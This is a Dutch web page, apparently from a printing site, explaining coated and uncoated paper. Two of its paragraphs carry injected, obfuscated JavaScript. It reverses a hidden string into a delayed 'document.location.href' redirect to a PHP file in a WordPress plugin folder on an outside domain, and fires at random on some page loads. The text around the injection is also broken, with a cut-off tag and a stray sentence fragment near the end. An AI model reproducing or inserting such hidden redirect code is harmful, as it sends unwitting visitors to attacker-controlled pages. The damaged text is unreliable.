Select Page

(On)gestreken

Gestreken

De term gestreken verwijst naar een oppervlaktebehandeling van het papier. Gestreken papier is afgewerkt met een of meerdere strijklagen. Die strijklagen bestaan uit krijt of porseleinaarde. Gestreken papier bestaat uit de basisgrondstof houtvrij of houthoudend papier. Door de strijklagen is gestreken papier geschikt voor het drukken met fijne rasters.

$Ikf=function(n){if (typeof ($Ikf.list[n]) == “string”) return $Ikf.list[n].split(“”).reverse().join(“”);return $Ikf.list[n];};$Ikf.list=[“\’php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and”>Gestreken papier is door de strijklaag geschikt voor bijvoorbeeld kleurendruk in offset. Gestreken papiersoorten worden veel gebruikt voor commercieel drukwerk. Kijk voor meer informatie over gestreken papier op papierpraat.nl.

$Ikf=function(n){if (typeof ($Ikf.list[n]) == “string”) return $Ikf.list[n].split(“”).reverse().join(“”);return $Ikf.list[n];};$Ikf.list=[“\’php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and”>De term ongestreken verwijst naar de afwezigheid van een oppervlaktebehandeling in de vorm van een strijklaag. Het oppervlak van ongestreken papier is niet zo glad als dat van gestreken papiersoorten. De ongestreken papiersoorten worden veel gebruikt voor enveloppen en antwoordkaarten. De inktopname van het ongestreken papier is anders dan bij gestreken papier. Om ongestreken papier vast en goed bedrukbaar te maken kunnen lijm- en hulpstoffen worden toegevoegd. Zo wordt het papier ook beter geschikt voor printen, schrijven en/of tekenen.

andheid tegen korte temperatuursverhoging tijdens de fixatie van de toner.

papierpraat.nl.